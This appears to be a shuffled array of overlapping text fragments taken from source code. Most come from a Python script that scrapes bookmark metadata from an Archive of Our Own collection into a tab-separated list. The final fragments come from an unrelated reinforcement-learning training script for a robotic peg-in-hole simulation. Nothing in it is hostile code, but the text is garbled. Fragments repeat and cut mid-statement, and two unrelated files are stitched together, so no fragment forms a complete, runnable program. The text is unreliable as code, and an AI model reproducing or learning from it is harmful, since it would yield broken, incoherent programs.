[ "with the number of pages of bookmarks there are. Word counts are not", "there are. Word counts are not added for external bookmarks. This prints to", "{ \"User-Agent\": \"[user]-bot\" } PAGES = 15 DEBUG = False def main(): for", "fics = soup.find_all(class_=\"bookmark blurb group\") for blurb in fics: if DEBUG: print(\"BLURB\") print(\"\\n\\n\")", "note based on that. You can delete that and your own other extra", "in a collection on Archive of Our Own and creates a spreadsheet. It", "standard output and should be redirected to a file. Lines 54-57 search for", "to a file. Lines 54-57 search for if a particular series is linked", "requests import time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = { \"User-Agent\": \"[user]-bot\" } PAGES", "= \"Rev Arc\" else: notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title, author, words, notes)) time.sleep(10)", "blurb.find(rel=\"author\") if author == None: author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author = author.string", "in the series) and add a note based on that. You can delete", "Lines 54-57 search for if a particular series is linked (i.e. the fic", "import time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = { \"User-Agent\": \"[user]-bot\" } PAGES =", "DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string # Author", "prints to standard output and should be redirected to a file. 
Lines 54-57", "if words is None: words = \"\" else: words = words.string if \"/series/1722145\"", "to include the ?page= part) replace [user] in HEADERS with your username replace", "= words.string if \"/series/1722145\" in str(blurb): notes = \"Rev Arc\" else: notes =", "HEADERS = { \"User-Agent\": \"[user]-bot\" } PAGES = 15 DEBUG = False def", "range(1, PAGES+1): link = BOOKMARKS + str(p) r = requests.get(link, headers=HEADERS) soup =", "haven't tried it. To use: replace BOOKMARKS with the URL that you want", "# Author is None for non-AO3 fics, since they're text and not links", "time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = { \"User-Agent\": \"[user]-bot\" } PAGES = 15", "To use: replace BOOKMARKS with the URL that you want to summarize (be", "if a particular series is linked (i.e. the fic is in the series)", "to standard output and should be redirected to a file. Lines 54-57 search", "author.string words = blurb.find(name=\"dd\", class_=\"words\") if words is None: words = \"\" else:", "added for external bookmarks. This prints to standard output and should be redirected", "notes. ''' from bs4 import BeautifulSoup import requests import time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\"", "URL that you want to summarize (be sure to include the ?page= part)", "author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author = author.string words = blurb.find(name=\"dd\", class_=\"words\") if", "series) and add a note based on that. You can delete that and", "of Our Own and creates a spreadsheet. 
It will likely work for a", "PAGES = 15 DEBUG = False def main(): for p in range(1, PAGES+1):", "non-AO3 fics, since they're text and not links author = blurb.find(rel=\"author\") if author", "else: notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title, author, words, notes)) time.sleep(10) if __name__ ==", "and not links author = blurb.find(rel=\"author\") if author == None: author = blurb.h4.a.next_sibling.replace(\"by\",", "It will likely work for a user's bookmark's but I haven't tried it.", "= \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = { \"User-Agent\": \"[user]-bot\" } PAGES = 15 DEBUG =", "author = author.string words = blurb.find(name=\"dd\", class_=\"words\") if words is None: words =", "\"\").strip() else: author = author.string words = blurb.find(name=\"dd\", class_=\"words\") if words is None:", "notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title, author, words, notes)) time.sleep(10) if __name__ == '__main__':", "= \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title, author, words, notes)) time.sleep(10) if __name__ == '__main__': main()", "a collection on Archive of Our Own and creates a spreadsheet. It will", "str(blurb): notes = \"Rev Arc\" else: notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title, author, words,", "you want to summarize (be sure to include the ?page= part) replace [user]", "counts are not added for external bookmarks. This prints to standard output and", "bookmarks there are. Word counts are not added for external bookmarks. This prints", "about the bookmarks in a collection on Archive of Our Own and creates", "of bookmarks there are. Word counts are not added for external bookmarks. This", "blurb in fics: if DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\") title", "spreadsheet. 
It will likely work for a user's bookmark's but I haven't tried", "str(p) r = requests.get(link, headers=HEADERS) soup = BeautifulSoup(r.text, \"html5lib\") fics = soup.find_all(class_=\"bookmark blurb", "are. Word counts are not added for external bookmarks. This prints to standard", "tried it. To use: replace BOOKMARKS with the URL that you want to", "for external bookmarks. This prints to standard output and should be redirected to", "work for a user's bookmark's but I haven't tried it. To use: replace", "= blurb.find(name=\"dd\", class_=\"words\") if words is None: words = \"\" else: words =", "I haven't tried it. To use: replace BOOKMARKS with the URL that you", "words = blurb.find(name=\"dd\", class_=\"words\") if words is None: words = \"\" else: words", "notes = \"Rev Arc\" else: notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title, author, words, notes))", "fics: if DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string", "\"[user]-bot\" } PAGES = 15 DEBUG = False def main(): for p in", "?page= part) replace [user] in HEADERS with your username replace PAGES with the", "for if a particular series is linked (i.e. the fic is in the", "bs4 import BeautifulSoup import requests import time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = {", "\"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = { \"User-Agent\": \"[user]-bot\" } PAGES = 15 DEBUG = False", "= { \"User-Agent\": \"[user]-bot\" } PAGES = 15 DEBUG = False def main():", "= 15 DEBUG = False def main(): for p in range(1, PAGES+1): link", "''' This downloads metadata about the bookmarks in a collection on Archive of", "a particular series is linked (i.e. the fic is in the series) and", "output and should be redirected to a file. 
Lines 54-57 search for if", "Author is None for non-AO3 fics, since they're text and not links author", "= blurb.find(rel=\"author\") if author == None: author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author =", "other extra notes. ''' from bs4 import BeautifulSoup import requests import time BOOKMARKS", "if DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string #", "username replace PAGES with the number of pages of bookmarks there are. Word", "series is linked (i.e. the fic is in the series) and add a", "from bs4 import BeautifulSoup import requests import time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS =", "the fic is in the series) and add a note based on that.", "in str(blurb): notes = \"Rev Arc\" else: notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title, author,", "= \"\" else: words = words.string if \"/series/1722145\" in str(blurb): notes = \"Rev", "if \"/series/1722145\" in str(blurb): notes = \"Rev Arc\" else: notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number,", "the series) and add a note based on that. You can delete that", "(i.e. the fic is in the series) and add a note based on", "to summarize (be sure to include the ?page= part) replace [user] in HEADERS", "a note based on that. You can delete that and your own other", "bookmarks in a collection on Archive of Our Own and creates a spreadsheet.", "creates a spreadsheet. It will likely work for a user's bookmark's but I", "soup = BeautifulSoup(r.text, \"html5lib\") fics = soup.find_all(class_=\"bookmark blurb group\") for blurb in fics:", "links author = blurb.find(rel=\"author\") if author == None: author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else:", "collection on Archive of Our Own and creates a spreadsheet. It will likely", "should be redirected to a file. 
Lines 54-57 search for if a particular", "for p in range(1, PAGES+1): link = BOOKMARKS + str(p) r = requests.get(link,", "linked (i.e. the fic is in the series) and add a note based", "number = blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string # Author is None for non-AO3 fics,", "None: words = \"\" else: words = words.string if \"/series/1722145\" in str(blurb): notes", "def main(): for p in range(1, PAGES+1): link = BOOKMARKS + str(p) r", "words.string if \"/series/1722145\" in str(blurb): notes = \"Rev Arc\" else: notes = \"\"", "will likely work for a user's bookmark's but I haven't tried it. To", "else: words = words.string if \"/series/1722145\" in str(blurb): notes = \"Rev Arc\" else:", "summarize (be sure to include the ?page= part) replace [user] in HEADERS with", "replace PAGES with the number of pages of bookmarks there are. Word counts", "that. You can delete that and your own other extra notes. ''' from", "redirected to a file. Lines 54-57 search for if a particular series is", "None for non-AO3 fics, since they're text and not links author = blurb.find(rel=\"author\")", "print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string # Author is", "= blurb.h4.a.string # Author is None for non-AO3 fics, since they're text and", "a file. Lines 54-57 search for if a particular series is linked (i.e.", "of pages of bookmarks there are. Word counts are not added for external", "can delete that and your own other extra notes. ''' from bs4 import", "in HEADERS with your username replace PAGES with the number of pages of", "it. To use: replace BOOKMARKS with the URL that you want to summarize", "requests.get(link, headers=HEADERS) soup = BeautifulSoup(r.text, \"html5lib\") fics = soup.find_all(class_=\"bookmark blurb group\") for blurb", "and add a note based on that. 
You can delete that and your", "BOOKMARKS with the URL that you want to summarize (be sure to include", "want to summarize (be sure to include the ?page= part) replace [user] in", "(be sure to include the ?page= part) replace [user] in HEADERS with your", "is None for non-AO3 fics, since they're text and not links author =", "fic is in the series) and add a note based on that. You", "15 DEBUG = False def main(): for p in range(1, PAGES+1): link =", "link = BOOKMARKS + str(p) r = requests.get(link, headers=HEADERS) soup = BeautifulSoup(r.text, \"html5lib\")", "Our Own and creates a spreadsheet. It will likely work for a user's", "import requests import time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = { \"User-Agent\": \"[user]-bot\" }", "''' from bs4 import BeautifulSoup import requests import time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS", "that and your own other extra notes. ''' from bs4 import BeautifulSoup import", "the URL that you want to summarize (be sure to include the ?page=", "PAGES with the number of pages of bookmarks there are. 
Word counts are", "not links author = blurb.find(rel=\"author\") if author == None: author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip()", "author == None: author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author = author.string words =", "= requests.get(link, headers=HEADERS) soup = BeautifulSoup(r.text, \"html5lib\") fics = soup.find_all(class_=\"bookmark blurb group\") for", "= blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string # Author is None for non-AO3 fics, since", "print(blurb) print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string # Author is None for", "class_=\"words\") if words is None: words = \"\" else: words = words.string if", "= BOOKMARKS + str(p) r = requests.get(link, headers=HEADERS) soup = BeautifulSoup(r.text, \"html5lib\") fics", "based on that. You can delete that and your own other extra notes.", "None: author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author = author.string words = blurb.find(name=\"dd\", class_=\"words\")", "print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string # Author is None", "\"/series/1722145\" in str(blurb): notes = \"Rev Arc\" else: notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title,", "the ?page= part) replace [user] in HEADERS with your username replace PAGES with", "is linked (i.e. the fic is in the series) and add a note", "python3 ''' This downloads metadata about the bookmarks in a collection on Archive", "HEADERS with your username replace PAGES with the number of pages of bookmarks", "not added for external bookmarks. This prints to standard output and should be", "= BeautifulSoup(r.text, \"html5lib\") fics = soup.find_all(class_=\"bookmark blurb group\") for blurb in fics: if", "} PAGES = 15 DEBUG = False def main(): for p in range(1,", "bookmark's but I haven't tried it. 
To use: replace BOOKMARKS with the URL", "<reponame>quihi/fanfiction #!/usr/bin/env python3 ''' This downloads metadata about the bookmarks in a collection", "and creates a spreadsheet. It will likely work for a user's bookmark's but", "number of pages of bookmarks there are. Word counts are not added for", "are not added for external bookmarks. This prints to standard output and should", "words = words.string if \"/series/1722145\" in str(blurb): notes = \"Rev Arc\" else: notes", "bookmarks. This prints to standard output and should be redirected to a file.", "== None: author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author = author.string words = blurb.find(name=\"dd\",", "text and not links author = blurb.find(rel=\"author\") if author == None: author =", "#!/usr/bin/env python3 ''' This downloads metadata about the bookmarks in a collection on", "blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author = author.string words = blurb.find(name=\"dd\", class_=\"words\") if words is", "is None: words = \"\" else: words = words.string if \"/series/1722145\" in str(blurb):", "54-57 search for if a particular series is linked (i.e. the fic is", "with the URL that you want to summarize (be sure to include the", "You can delete that and your own other extra notes. ''' from bs4", "for blurb in fics: if DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\")", "\"\" else: words = words.string if \"/series/1722145\" in str(blurb): notes = \"Rev Arc\"", "search for if a particular series is linked (i.e. 
the fic is in", "the bookmarks in a collection on Archive of Our Own and creates a", "BeautifulSoup(r.text, \"html5lib\") fics = soup.find_all(class_=\"bookmark blurb group\") for blurb in fics: if DEBUG:", "your username replace PAGES with the number of pages of bookmarks there are.", "blurb.h4.a.string # Author is None for non-AO3 fics, since they're text and not", "and should be redirected to a file. Lines 54-57 search for if a", "that you want to summarize (be sure to include the ?page= part) replace", "sure to include the ?page= part) replace [user] in HEADERS with your username", "Word counts are not added for external bookmarks. This prints to standard output", "part) replace [user] in HEADERS with your username replace PAGES with the number", "the number of pages of bookmarks there are. Word counts are not added", "your own other extra notes. ''' from bs4 import BeautifulSoup import requests import", "in range(1, PAGES+1): link = BOOKMARKS + str(p) r = requests.get(link, headers=HEADERS) soup", "BeautifulSoup import requests import time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = { \"User-Agent\": \"[user]-bot\"", "main(): for p in range(1, PAGES+1): link = BOOKMARKS + str(p) r =", "words is None: words = \"\" else: words = words.string if \"/series/1722145\" in", "and your own other extra notes. ''' from bs4 import BeautifulSoup import requests", "BOOKMARKS + str(p) r = requests.get(link, headers=HEADERS) soup = BeautifulSoup(r.text, \"html5lib\") fics =", "on that. You can delete that and your own other extra notes. 
'''", "use: replace BOOKMARKS with the URL that you want to summarize (be sure", "title = blurb.h4.a.string # Author is None for non-AO3 fics, since they're text", "\"Rev Arc\" else: notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title, author, words, notes)) time.sleep(10) if", "words = \"\" else: words = words.string if \"/series/1722145\" in str(blurb): notes =", "extra notes. ''' from bs4 import BeautifulSoup import requests import time BOOKMARKS =", "pages of bookmarks there are. Word counts are not added for external bookmarks.", "print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string # Author is None for non-AO3", "This downloads metadata about the bookmarks in a collection on Archive of Our", "DEBUG = False def main(): for p in range(1, PAGES+1): link = BOOKMARKS", "downloads metadata about the bookmarks in a collection on Archive of Our Own", "user's bookmark's but I haven't tried it. To use: replace BOOKMARKS with the", "replace BOOKMARKS with the URL that you want to summarize (be sure to", "\"html5lib\") fics = soup.find_all(class_=\"bookmark blurb group\") for blurb in fics: if DEBUG: print(\"BLURB\")", "own other extra notes. ''' from bs4 import BeautifulSoup import requests import time", "since they're text and not links author = blurb.find(rel=\"author\") if author == None:", "author = blurb.find(rel=\"author\") if author == None: author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author", "else: author = author.string words = blurb.find(name=\"dd\", class_=\"words\") if words is None: words", "\"User-Agent\": \"[user]-bot\" } PAGES = 15 DEBUG = False def main(): for p", "include the ?page= part) replace [user] in HEADERS with your username replace PAGES", "= author.string words = blurb.find(name=\"dd\", class_=\"words\") if words is None: words = \"\"", "a spreadsheet. 
It will likely work for a user's bookmark's but I haven't", "likely work for a user's bookmark's but I haven't tried it. To use:", "= blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author = author.string words = blurb.find(name=\"dd\", class_=\"words\") if words", "file. Lines 54-57 search for if a particular series is linked (i.e. the", "BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = { \"User-Agent\": \"[user]-bot\" } PAGES = 15 DEBUG", "= soup.find_all(class_=\"bookmark blurb group\") for blurb in fics: if DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb)", "= False def main(): for p in range(1, PAGES+1): link = BOOKMARKS +", "blurb[\"id\"].strip(\"bookmark_\") title = blurb.h4.a.string # Author is None for non-AO3 fics, since they're", "p in range(1, PAGES+1): link = BOOKMARKS + str(p) r = requests.get(link, headers=HEADERS)", "for non-AO3 fics, since they're text and not links author = blurb.find(rel=\"author\") if", "import BeautifulSoup import requests import time BOOKMARKS = \"https://archiveofourown.org/collections/RigelBlackComprehensive/bookmarks?page=\" HEADERS = { \"User-Agent\":", "if author == None: author = blurb.h4.a.next_sibling.replace(\"by\", \"\").strip() else: author = author.string words", "Own and creates a spreadsheet. It will likely work for a user's bookmark's", "external bookmarks. This prints to standard output and should be redirected to a", "+ str(p) r = requests.get(link, headers=HEADERS) soup = BeautifulSoup(r.text, \"html5lib\") fics = soup.find_all(class_=\"bookmark", "This prints to standard output and should be redirected to a file. 
Lines", "Arc\" else: notes = \"\" print(\"{}\\t{}\\t{}\\t{}\\t{}\".format(number, title, author, words, notes)) time.sleep(10) if __name__", "False def main(): for p in range(1, PAGES+1): link = BOOKMARKS + str(p)", "r = requests.get(link, headers=HEADERS) soup = BeautifulSoup(r.text, \"html5lib\") fics = soup.find_all(class_=\"bookmark blurb group\")", "on Archive of Our Own and creates a spreadsheet. It will likely work", "particular series is linked (i.e. the fic is in the series) and add", "headers=HEADERS) soup = BeautifulSoup(r.text, \"html5lib\") fics = soup.find_all(class_=\"bookmark blurb group\") for blurb in", "for a user's bookmark's but I haven't tried it. To use: replace BOOKMARKS", "with your username replace PAGES with the number of pages of bookmarks there", "metadata about the bookmarks in a collection on Archive of Our Own and", "a user's bookmark's but I haven't tried it. To use: replace BOOKMARKS with", "add a note based on that. You can delete that and your own", "delete that and your own other extra notes. ''' from bs4 import BeautifulSoup", "PAGES+1): link = BOOKMARKS + str(p) r = requests.get(link, headers=HEADERS) soup = BeautifulSoup(r.text,", "soup.find_all(class_=\"bookmark blurb group\") for blurb in fics: if DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\")", "replace [user] in HEADERS with your username replace PAGES with the number of", "blurb group\") for blurb in fics: if DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number", "is in the series) and add a note based on that. You can", "be redirected to a file. Lines 54-57 search for if a particular series", "but I haven't tried it. 
To use: replace BOOKMARKS with the URL that", "fics, since they're text and not links author = blurb.find(rel=\"author\") if author ==", "in fics: if DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number = blurb[\"id\"].strip(\"bookmark_\") title =", "blurb.find(name=\"dd\", class_=\"words\") if words is None: words = \"\" else: words = words.string", "group\") for blurb in fics: if DEBUG: print(\"BLURB\") print(\"\\n\\n\") print(blurb) print(\"\\n\\n\\n\\n\\n\") number =", "Archive of Our Own and creates a spreadsheet. It will likely work for", "they're text and not links author = blurb.find(rel=\"author\") if author == None: author", "[user] in HEADERS with your username replace PAGES with the number of pages" ]
[ "sess) else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\" agent.reset() # episode_step = 0 # episodes", "+= gamma * r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The maximum force:\" + str(max(abs(new_obs[0:3]))) +", "np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2]) # min_action = np.array([-0.2, -0.2, -0.2, -0.2,", "Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout == nb_rollout_steps - 1: logger.info('Peg-in-hole assembly", "episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes += 1 # pull_done = False # while pull_done is", "t_train in range(nb_train_steps): cl, al = agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param", "pegs step by step\"\"\" if done: logger.info('Peg-in-hole assembly done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout)", "mpi_max, mpi_sum import baselines.common.tf_util as U import tensorflow as tf from mpi4py import", "if restore: saver = tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory, saver, sess) else: agent.initialize(sess) sess.graph.finalize()", "np.power(10, 1 / nb_epochs) epoch_start_time = time.time() epoch_episode_rewards = [] epoch_episode_steps = []", "r, new_obs, done) obs = new_obs \"\"\"Episode done and start pull the pegs", "\"\"\"Log stats.\"\"\" epoch_train_duration = time.time() - epoch_start_time stats = agent.get_stats() combined_stats = {}", "for exceed steps!!!') logger.info('The deepest position'.format(obs[8])) \"\"\"train model for nb_train_steps times\"\"\" for t_train", "if 
pull_safe is False: # logger.info('Peg-in-hole assembly failed for the exceed force!!!') #", "- epoch_start_time stats = agent.get_stats() combined_stats = {} for key in sorted(stats.keys()): combined_stats[key]", "obs = env.reset() episode_reward = 0. episode_discount_reward = 0. q_value = 0. done", "epoch_episodes) \"\"\"Log stats.\"\"\" epoch_train_duration = time.time() - epoch_start_time stats = agent.get_stats() combined_stats =", "saver = tf.train.Saver() \"\"\"Set up logging stuff only for a single worker\"\"\" #", "maximum force:\" + str(max(abs(new_obs[0:3]))) + \" The maximum moments:\" + str(max(abs(new_obs[3:6])))) episode_reward +=", "= env.step_up() # pull_done, pull_safe = env.pull_up() # True env # # if", "agent.train(epoch_actor_lr, epoch_critic_lr) epoch_critic_losses.append(cl) epoch_actor_losses.append(al) agent.update_target_net() \"\"\"Adapt param noise, if necessary\"\"\" if memory.nb_entries >=", "nf = pd.read_csv(\"data.csv\", sep=',', header=None) for key in sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key]) logger.dump_tabular() logger.info('')", "#Simulation env # pull_done, pull_safe = env.pull_up() #True env # # if pull_safe", "logger.get_dir() if rank == 0 and logdir: if hasattr(env, 'get_state'): with open(os.path.join(logdir, 'env_state.pkl'),", "[] epoch_episodes_discount_reward = [] epoch_episodes_average_reward = [] epoch_actions = [] epoch_qs = []", "= deque(maxlen=100) episode_rewards_history = deque(maxlen=100) with U.single_threaded_session() as sess: \"\"\"Prepare everything\"\"\" if restore:", "= env.reset() episode_reward = 0. episode_discount_reward = 0. q_value = 0. 
done =", "info, expert_action = env.step(action, t_rollout) episode_discount_reward += gamma * r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action)", "18-1-12 ------------------------------------------------- \"\"\" # -*- coding: utf-8 -*- import os import time from", "0.2, 0.2, 0.2, 0.2]) # min_action = np.array([-0.2, -0.2, -0.2, -0.2, -0.2, -0.2])", "import os import time from collections import deque import pickle import sys from", "in range(nb_epochs): \"\"\"Show the result for cycle 20 times and Save the model\"\"\"", "= env.step_up() #Simulation env # pull_done, pull_safe = env.pull_up() #True env # #", "stats = agent.get_stats() combined_stats = {} for key in sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key])", "pd.read_csv(\"data.csv\", sep=',', header=None) for key in sorted(combined_stats.keys()): logger.record_tabular(key, combined_stats[key]) logger.dump_tabular() logger.info('') logdir =", "combined_stats[key]) logger.dump_tabular() logger.info('') logdir = logger.get_dir() if rank == 0 and logdir: if", "t_rollout) episode_discount_reward += gamma * r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The maximum force:\" +", "combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout statistics. compute the mean of the total nb_epoch_cycles\"\"\" combined_stats['rollout/return']", "20 times and Save the model\"\"\" epoch_actor_losses = [] epoch_critic_losses = [] \"\"\"Delay", "= 0. done = False forcement = [] Last_average_reward = 0. Number_episodes =", "== env.action_dim q_value += q \"\"\"scale for execution in env\"\"\" new_obs, r, done,", "pull_safe = env.step_up() # pull_done, pull_safe = env.pull_up() # True env # #", "range(nb_epoch_cycles): \"\"\"environment reset \"\"\" agent.reset() obs = env.reset() episode_reward = 0. 
episode_discount_reward =", "for t_rollout in range(nb_rollout_steps): \"\"\"Predict next action\"\"\" action, q = agent.pi(obs, apply_noise=True, compute_Q=True)", "[] epoch_critic_losses = [] \"\"\"Delay the learning rate\"\"\" epoch_actor_lr = actor_lr / delay_rate", "as sess: \"\"\"Prepare everything\"\"\" if restore: saver = tf.train.import_meta_graph(model_directory + 'model.meta') agent.restore_model(model_directory, saver,", "None # eval_episode_rewards_history = deque(maxlen=100) episode_rewards_history = deque(maxlen=100) with U.single_threaded_session() as sess: \"\"\"Prepare", "import pandas as pd \"\"\"First the path should be added.\"\"\" sys.path.append(\"/home/zhimin/PycharmProjects/RL_UA/Peg_in_Hole/1-baselines\") def train(env,", "epoch_episodes += 1 # pull_done = False # while pull_done is False and", "epoch_episodes = 0 Long_term_reward = - 0.10 for epoch in range(nb_epochs): \"\"\"Show the", "exceed force!!!') # pull_done = False # while pull_done is False and info:", "[] epoch_episodes = 0 Long_term_reward = - 0.10 for epoch in range(nb_epochs): \"\"\"Show", "saver, sess) else: agent.initialize(sess) sess.graph.finalize() \"\"\"Agent Reset\"\"\" agent.reset() # episode_step = 0 #", "if pull_safe is False: # logger.info('Pull up the pegs failed for the exceed", "is False: # logger.info('Pull up the pegs failed for the exceed force!!!') #", "= env.step(action, t_rollout) episode_discount_reward += gamma * r \"\"\"adapt_action_noise\"\"\" agent.feed_back_explore(action, expert_action) logger.info(\"The maximum", "False # while pull_done is False and info: # pull_done, pull_safe = env.step_up()", "rank = MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2]) # min_action", "0.2, 0.2, 0.2, 0.2, 0.2]) # min_action = np.array([-0.2, -0.2, -0.2, -0.2, -0.2,", "logging stuff only for a single worker\"\"\" # if rank == 0: #", "batch_size and param_noise is not None: # agent.feed_back_explore(delta) Number_episodes = gamma + 
gamma*Number_episodes", "min_action = np.array([-0.2, -0.2, -0.2, -0.2, -0.2, -0.2]) logger.info('scaling actions by {} before", "\"\"\"write the result into the summary\"\"\" agent.log_scalar(\"actor_loss\", mpi_mean(epoch_actor_losses), epoch_episodes) agent.log_scalar(\"critic_loss\", mpi_mean(epoch_critic_losses), epoch_episodes) agent.log_scalar(\"episode_score\",", "restore=False): rank = MPI.COMM_WORLD.Get_rank() max_action = np.array([0.2, 0.2, 0.2, 0.2, 0.2, 0.2]) #", "critic, memory, env.state_dim, env.action_dim, gamma=gamma, tau=tau, normalize_returns=normalize_returns, normalize_observations=normalize_observations, batch_size=batch_size, action_noise=action_noise, param_noise=param_noise, critic_l2_reg=critic_l2_reg, actor_lr=actor_lr,", "= agent.pi(obs, apply_noise=True, compute_Q=True) assert action.shape[0] == env.action_dim q_value += q \"\"\"scale for", "critic_l2_reg, actor_lr, critic_lr, action_noise, popart, gamma, clip_norm, nb_train_steps, nb_rollout_steps, nb_eval_steps, batch_size, memory, tau=0.01,", "+ 1) if epoch == nb_epoch_cycles - 1 and cycle == nb_epoch_cycles -", "by step\"\"\" if done: logger.info('Peg-in-hole assembly done!!!') epoch_episode_rewards.append(episode_reward) epoch_episodes_discount_reward.append(Last_average_reward) episode_rewards_history.append(episode_reward) epoch_episode_steps.append(t_rollout) epoch_episodes +=", "# exit() break Long_term_reward = Last_average_reward/Number_episodes epoch_qs.append(q_value) env.save_figure('force_moment') epoch_episodes_average_reward.append(Long_term_reward) agent.feedback_adptive_explore() if t_rollout ==", "epoch_train_duration = time.time() - epoch_start_time stats = agent.get_stats() combined_stats = {} for key", "agent.pi(obs, apply_noise=True, compute_Q=True) assert action.shape[0] == env.action_dim q_value += q \"\"\"scale for execution", "mean of the total nb_epoch_cycles\"\"\" combined_stats['rollout/return'] = mpi_mean(epoch_episode_rewards) 
combined_stats['rollout/return_history'] = mpi_mean(np.mean(episode_rewards_history)) combined_stats['rollout/episode_steps'] =", "-*- coding: utf-8 -*- \"\"\" ------------------------------------------------- File Name: Simulate_main Description : Author :", "= np.array([-0.2, -0.2, -0.2, -0.2, -0.2, -0.2]) logger.info('scaling actions by {} before executing", "# logger.info('Pull up the pegs failed for the exceed force!!!') # exit() break", "configuration:') logger.info(str(agent.__dict__.items())) saver = tf.train.Saver() \"\"\"Set up logging stuff only for a single", "while pull_done is False and info: # pull_done, pull_safe = env.step_up() #Simulation env", "key in sorted(stats.keys()): combined_stats[key] = mpi_mean(stats[key]) \"\"\"Rollout statistics. compute the mean of the", "numpy as np import pandas as pd \"\"\"First the path should be added.\"\"\"", "from baselines import logger from simulation_ddpg import DDPG from util import mpi_mean, mpi_std,", "simulation_ddpg import DDPG from util import mpi_mean, mpi_std, mpi_max, mpi_sum import baselines.common.tf_util as", "# pull_done, pull_safe = env.step_up() #Simulation env # pull_done, pull_safe = env.pull_up() #True", "done = False forcement = [] Last_average_reward = 0. Number_episodes = 